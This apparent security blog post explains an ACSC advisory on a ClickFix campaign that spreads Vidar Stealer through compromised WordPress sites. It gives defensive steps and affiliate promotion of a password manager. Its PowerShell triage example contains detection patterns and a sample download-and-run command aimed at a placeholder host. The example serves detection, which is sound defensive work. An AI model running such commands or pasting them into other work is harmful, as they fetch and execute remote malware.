ClickFix Vidar Stealer: ACSC Warns Australian Businesses of WordPress Infostealer Campaign
Australia's national cyber authority has issued a formal advisory warning businesses and individuals about an active ClickFix campaign using compromised WordPress websites to distribute Vidar Stealer — an infostealer capable of harvesting saved passwords, session cookies, and cryptocurrency wallet details from infected devices. The attack requires no software exploit: it tricks users into running a malicious PowerShell command themselves, bypassing most endpoint defences. Here is what is happening, who is at risk, and what to do.
Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.
What Is the ClickFix Campaign and Why Is Australia Being Targeted?
The Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) issued an advisory in early May 2026 warning that threat actors are actively targeting Australian networks using a social engineering technique known as ClickFix. Unlike most malware campaigns that rely on software vulnerabilities or drive-by downloads, ClickFix weaponises user behaviour — it tricks people into willingly running malicious commands on their own devices.
The advisory, published on cyber.gov.au, confirmed that more than 250 websites have been identified as part of the campaign's infrastructure across at least 12 countries, with Australia explicitly named as a targeted country. Critically, the campaign uses compromised WordPress websites belonging to legitimate Australian businesses as part of its delivery infrastructure. This means Australian site owners face a dual risk: their visitors can be targeted for malware infection, and their websites are being used as stepping stones without the owner's knowledge or consent.
The sectors identified as targets in the ACSC advisory include healthcare, government, hospitality, and education — industries that handle large volumes of sensitive personal and financial data. For Australian small and medium businesses operating in these sectors, the campaign represents a direct and immediate threat rather than an abstract risk.
ClickFix as a technique was first observed in the wild in early 2024, but its weaponisation against Australian infrastructure at scale in 2026 represents a significant escalation. Security researchers at Bleeping Computer, Bitdefender, and the ACSC have all independently corroborated the campaign's active status, making this a well-evidenced threat. The scale of the campaign — spanning more than a dozen countries and hundreds of compromised sites — also indicates this is not an opportunistic one-off but an organised criminal operation with the resources to maintain infrastructure across multiple jurisdictions.
For Australian businesses, the most concerning aspect of the ACSC advisory is the confirmation that Australian WordPress sites are being used as part of the attack chain. A site owner may have no idea their installation has been compromised and is now directing their customers or visitors toward malware delivery. This secondary victimisation carries reputational risk, potential regulatory exposure under the Privacy Act's Notifiable Data Breaches scheme, and the real possibility that visitor credentials are being harvested as a direct result of a website compromise that the owner was unaware of.
How the Attack Works: Fake CAPTCHA to PowerShell Execution
The ClickFix attack chain is deceptively simple, and that simplicity is precisely what makes it effective. A user visits a compromised website — one that appears entirely normal, often belonging to a legitimate Australian business whose WordPress installation has been silently hijacked. Instead of seeing the expected content, the user is presented with a page that mimics a Cloudflare browser verification screen or a CAPTCHA challenge. Both are UI patterns that users have been trained to complete without scrutiny.
The fake prompt instructs the user to "verify they are human" by following a short sequence of steps: press a keyboard shortcut to open the Windows Run dialog or PowerShell prompt, paste a command that the page has already loaded into the clipboard, and press Enter to execute. The command in the clipboard is a malicious PowerShell instruction. Once executed, it silently downloads and installs Vidar Stealer on the victim's device. The entire process takes under a minute and requires no technical knowledge from the victim.
This attack vector is significant because it bypasses many common endpoint protections. Most antivirus tools and email security gateways are designed to intercept malicious files arriving via download or attachment — not to detect the user themselves pasting and executing a command at the prompt. The malicious activity originates from a trusted system process (PowerShell) rather than a suspicious executable, which limits how much behavioural detection can help at the point of execution.
Application whitelisting can block this attack if PowerShell execution is restricted for non-administrator accounts, but this control is absent in the majority of Australian SMB environments. The ACSC advisory specifically recommends implementing guidance to restrict the execution of unauthorised or unapproved applications — language that directly maps to the Essential Eight's Application Control mitigation strategy at Maturity Level 1.
It is also worth noting that the ClickFix technique is not specific to Vidar Stealer. Security researchers have documented its use to distribute other malware families including DarkGate, NetSupport RAT, and Lumma Stealer. The delivery mechanism will outlast the current campaign: once a social engineering template proves effective at this scale, criminal groups adopt and iterate on it. Australian businesses should treat this as a persistent threat class, not a single campaign to wait out.
Inside Vidar Stealer: What the Malware Harvests from Your Device
Vidar Stealer is a mature and continuously developed infostealer malware family, first observed in late 2018 and derived from the Arkei stealer codebase. As of 2026, it remains one of the most actively distributed infostealers, operated as a subscription-based Malware-as-a-Service. This commercial model means any moderately motivated attacker can deploy it without developing the malware themselves — subscriptions reportedly start from around $100 per month on underground forums. That accessibility is part of why the ACSC is seeing it deployed at this scale.
Once executed on a victim's system, Vidar works through a priority list designed to maximise the value extracted from each infection.
Browser credential extraction
Vidar systematically extracts saved usernames and passwords from all major browsers — Chrome, Edge, Firefox, Opera, and Vivaldi. In its updated 2.0 form, Vidar bypasses Chrome's App-Bound Encryption through direct memory injection, meaning Google's enhanced browser-level protection for saved passwords does not reliably deter it. Every set of credentials saved in a browser's built-in password manager is a viable target. For businesses where staff routinely save work credentials in their browser for convenience, a single infected device can expose the entire portfolio of that employee's account access.
Session cookies and authentication tokens
Beyond static passwords, Vidar harvests live session cookies. These are particularly dangerous because they represent proof of completed authentication — including completed multi-factor authentication challenges. An attacker who obtains a valid session cookie for a banking portal or cloud service can authenticate as the victim without knowing the password or having access to the second factor. This is the same mechanism that has featured in several high-profile Australian breaches in 2026: MFA is bypassed not by breaking the authentication system, but by stealing the credential that proves it was already completed.
Cryptocurrency wallet data
Vidar targets more than 50 cryptocurrency wallet applications, extracting wallet files, private keys, and seed phrases. For Australians who hold crypto assets in software wallets, a Vidar infection is a direct and immediate threat to those holdings. There is no recovery path for a stolen private key or seed phrase.
Evasion: fileless execution after initial drop
A notable operational feature of Vidar is that it deletes its own executable file immediately after launching and continues operating from system memory. This substantially reduces forensic artifacts — many victims would find no trace of the malware on disk if they checked after the fact. The infection's evidence is the data exfiltrated, not files left behind. This behaviour also means that basic file-scanning antivirus products are less likely to detect an active Vidar infection, since the file they would scan is no longer present.
The combination of these capabilities means a single ClickFix interaction — one fake CAPTCHA completed — can hand attackers the keys to a victim's entire online identity: banking, email, cloud services, business systems, and financial assets simultaneously.
What Australian Businesses and Individuals Should Do Now
The ACSC advisory outlines recommended actions, and independent security researchers have expanded on these. Below is a prioritised response for Australian businesses and individuals, ordered by effectiveness against this specific threat.
Check whether your WordPress site has been compromised. If you operate a WordPress website, review recently modified files in your wp-content/themes and wp-content/plugins directories. Check your hosting provider's access logs for unusual traffic patterns, particularly requests to recently added PHP files in unexpected locations. Unexplained injections into theme files are a common indicator of the type of compromise used to deliver ClickFix redirects. If your site is hosted on a managed platform, contact your host directly and ask them to run an integrity scan.
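The file-and-log review described above, as an added example rather than code from the ACSC advisory or this article: it lists PHP files under wp-content/themes and wp-content/plugins changed within a window, then cross-checks a combined-format (Apache/Nginx) access log for requests to those files. The directory layout, file names, IPs and timestamps are constructed; collect_mtimes() is the only part that touches a real install.

```python
import os
import re
from datetime import datetime, timedelta

# Constructed sample: paths relative to the WordPress root mapped to modification
# times, shaped like what collect_mtimes() below produces from a real install.
NOW = datetime(2026, 5, 10, 9, 0, 0)
SAMPLE_MTIMES = {
    "wp-content/themes/twentytwentyfour/functions.php": NOW - timedelta(days=120),
    "wp-content/themes/twentytwentyfour/header.php": NOW - timedelta(days=2),
    "wp-content/plugins/contact-form/contact-form.php": NOW - timedelta(days=90),
    "wp-content/plugins/contact-form/assets/cfx-check.php": NOW - timedelta(hours=6),
    "wp-content/uploads/2026/05/brochure.pdf": NOW - timedelta(days=1),
}
# Constructed Apache combined-format access log (documentation-range IPs, fictional paths).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2026:08:12:01 +1000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2026:08:40:33 +1000] "GET /wp-content/plugins/contact-form/assets/cfx-check.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2026:08:41:02 +1000] "POST /wp-content/plugins/contact-form/assets/cfx-check.php HTTP/1.1" 200 14 "-" "python-requests/2.31"
203.0.113.8 - - [10/May/2026:08:55:10 +1000] "GET /wp-content/themes/twentytwentyfour/style.css HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def recent_php_files(mtimes, now, days=7):
    """PHP files under wp-content/themes or wp-content/plugins changed within the window."""
    cutoff = now - timedelta(days=days)
    return sorted(p for p, m in mtimes.items()
                  if p.endswith(".php") and m >= cutoff
                  and p.startswith(("wp-content/themes/", "wp-content/plugins/")))

def requests_to(paths, log_text):
    """(ip, method, path, status) for every log line that requested one of the paths."""
    wanted = {"/" + p for p in paths}
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("path").split("?", 1)[0] in wanted:
            hits.append((m.group("ip"), m.group("method"), m.group("path"), m.group("status")))
    return hits

def collect_mtimes(root):
    """Walk a real WordPress root and build the same mapping as SAMPLE_MTIMES."""
    out = {}
    for dirpath, _, files in os.walk(os.path.join(root, "wp-content")):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = datetime.fromtimestamp(os.stat(full).st_mtime)
    return out
```

On a live site, replace SAMPLE_MTIMES with collect_mtimes("/var/www/html") and SAMPLE_LOG with the contents of the access log; a recently added PHP file that is already receiving POST requests from a scripted client, as the sample shows, is the pattern to escalate to the host.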
Restrict PowerShell execution for non-administrator accounts. This is the single most direct technical control against ClickFix-style attacks. Windows PowerShell execution policies can be set at user and machine level via Group Policy. For most employees and home users, restricting PowerShell execution to signed scripts or requiring administrator elevation removes ClickFix's primary delivery path. Most SMB users have no legitimate need to run unsigned PowerShell scripts in the course of a normal workday. This control is achievable without specialist tooling and is free to implement on any Windows environment.
Train staff and household members on the ClickFix prompt pattern. ClickFix succeeds because users trust CAPTCHA and browser verification prompts as routine. A single clear message — no legitimate website will ever instruct you to open the Run dialog, paste a command, and press Enter — is sufficient to eliminate that trust for most people. This training takes two minutes and removes the human vulnerability the entire attack chain depends on. For businesses, this should be sent as a direct communication to all staff immediately, given the active campaign status confirmed by the ACSC.
Treat any potentially exposed device as fully compromised. If there is any possibility that a device has been exposed — a staff member completed an unexpected CAPTCHA on an unfamiliar site — treat it as a confirmed Vidar infection. Change passwords for all critical accounts from a different, clean device, prioritising banking, email, cloud services, and business systems. Because Vidar can harvest all saved browser credentials in a single pass, a single compromised device can mean every saved browser credential on that device is in attacker hands.
Move credentials out of the browser. Browser-saved passwords are Vidar's primary target. A dedicated password manager stores credentials in an encrypted vault that is architecturally separate from the browser's credential store, significantly limiting what an infostealer can access through the browser API. NordPass provides an encrypted credential vault with breach-monitoring alerts — if your email address appears in a fresh credential dump, NordPass notifies you so you can act before attackers do. Its zero-knowledge architecture means your master password never leaves your device, and the vault contents are inaccessible even in the event of a server-side breach at NordPass itself. For small businesses looking to reduce their exposure to credential-theft campaigns specifically, moving away from browser-saved passwords is one of the highest-return changes available.
Building a Layered Defence Against Social Engineering at Scale
The ClickFix and Vidar Stealer campaign is not an isolated event. It represents a broader shift in how credential theft operates at the criminal-enterprise level. Security researchers have documented ClickFix being used to distribute at least four separate malware families in 2026: Vidar Stealer, DarkGate, NetSupport RAT, and Lumma Stealer. Multiple independent criminal groups have adopted the technique, and it will continue to appear with new payloads long after the current ACSC-documented campaign is disrupted. The controls below address the structural vulnerabilities ClickFix exploits, not just this specific campaign.
Align with the ACSC Essential Eight. The ACSC's Essential Eight mitigation strategies directly address the attack surfaces ClickFix exploits. Application Control at Maturity Level 1 prevents unapproved executables from running — including unsigned PowerShell payloads. Patching Applications and Patching Operating Systems close the browser-level vulnerabilities that infostealers sometimes chain with social engineering to deepen access. Restricting Administrative Privileges limits what an infostealer can do even if it executes — Vidar running in a standard user context has less access to system-protected credential stores than the same malware running with elevation. These are not aspirational controls; the ACSC designed the Essential Eight specifically for Australian organisations, including SMBs, and provides free guidance on implementation at each maturity level.
Keep WordPress fully patched, including plugins and themes. The ClickFix campaign uses compromised WordPress installations as delivery infrastructure, and the majority of those compromises exploit outdated plugins and themes rather than WordPress core itself. Outdated plugins are the primary initial access vector for WordPress compromise globally. Keeping every installed plugin and theme current — and removing inactive ones entirely — closes the most common entry points. The WordPress.org plugin directory flags plugins that have not been updated in over two years; those should be treated as a security liability regardless of their published vulnerability status.
Monitor PowerShell execution logs. Once Script Block Logging is enabled, Windows Event Log captures the content of executed PowerShell code as Event ID 4104. Configuring alerts for PowerShell executions initiated from unusual parent processes — such as the Windows Run dialog — can surface ClickFix activity before exfiltration completes. This is achievable using Windows Event Viewer without a dedicated security platform.
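A triage routine for the two event types involved, as an added example and not code from the advisory or this article. One caveat it reflects: a 4104 record carries the script text but not the parent process, so the Run-dialog signal (PowerShell spawned directly by explorer.exe) comes from Security Event ID 4688, which only includes the command line when the "Include command line in process creation events" audit policy is on. The hostname, paths, URL and the event records themselves are constructed.

```python
import re

# Launch-style indicators commonly used in defensive rules for PowerShell script
# blocks (Event ID 4104) and process command lines (Event ID 4688).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-restmethod|\birm\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def score_text(text):
    """Names of the indicators that match one script block or command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def spawned_from_explorer(event):
    """4688 record where PowerShell's parent is explorer.exe, as a Run-dialog launch is."""
    parent = event.get("ParentProcessName", "").lower()
    child = event.get("NewProcessName", "").lower()
    return parent.endswith("\\explorer.exe") and child.endswith(("\\powershell.exe", "\\pwsh.exe"))

def triage(events, min_hits=2):
    """One (host, event id, reasons) tuple per event that looks like a ClickFix-style launch."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 4104:
            hits = score_text(ev["ScriptBlockText"])
            if len(hits) >= min_hits:
                alerts.append((ev["Computer"], 4104, hits))
        elif ev["EventID"] == 4688:  # CommandLine is empty unless command-line auditing is enabled
            hits = score_text(ev.get("CommandLine", ""))
            if spawned_from_explorer(ev):
                hits = ["explorer_parent"] + hits
            if "explorer_parent" in hits or len(hits) >= min_hits:
                alerts.append((ev["Computer"], 4688, hits))
    return alerts

# Constructed sample events (hostname, paths and URL are placeholders, not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS-RECEPTION",
     "ScriptBlockText": "Get-ChildItem C:\\Reports | Sort-Object Length"},
    {"EventID": 4688, "Computer": "WS-RECEPTION", "ParentProcessName": "C:\\Windows\\System32\\svchost.exe",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"EventID": 4688, "Computer": "WS-RECEPTION", "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAAAAAAA"},
    {"EventID": 4104, "Computer": "WS-RECEPTION",
     "ScriptBlockText": "Invoke-Expression (Invoke-WebRequest -UseBasicParsing 'http://example.invalid/verify').Content"},
]
```

Running triage(SAMPLE_EVENTS) flags the explorer-spawned hidden, encoded launch and the download-and-run script block while leaving the scheduled backup script and the directory listing alone; in practice the event dictionaries are built from the XML of the Microsoft-Windows-PowerShell/Operational and Security logs.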
Enforce unique credentials across every account. One of the compounding harms from any infostealer infection is credential reuse. When a single harvested password unlocks multiple accounts, the damage from one infected device multiplies across every service that shares that password. Using NordPass to generate and store unique, high-entropy passwords for every account means that even if Vidar successfully harvests credentials from a session, the attacker gains access to only that single account rather than a master key that unlocks the victim's entire digital life. This is the foundational credential hygiene practice that makes infostealer campaigns significantly less damaging, even when they partially succeed.
The ACSC advisory on ClickFix and Vidar Stealer documents a campaign using Australian infrastructure against Australian users right now. The controls above are achievable for any business this week — most without enterprise-level budget or dedicated security staff. Treating a formal ACSC advisory as a prompt for immediate action is the posture it is designed to encourage.
The views expressed in this article are editorial opinion and general information only. They do not constitute professional security, legal, or financial advice. Always verify details with primary sources and consult a qualified professional before making security decisions based on this content.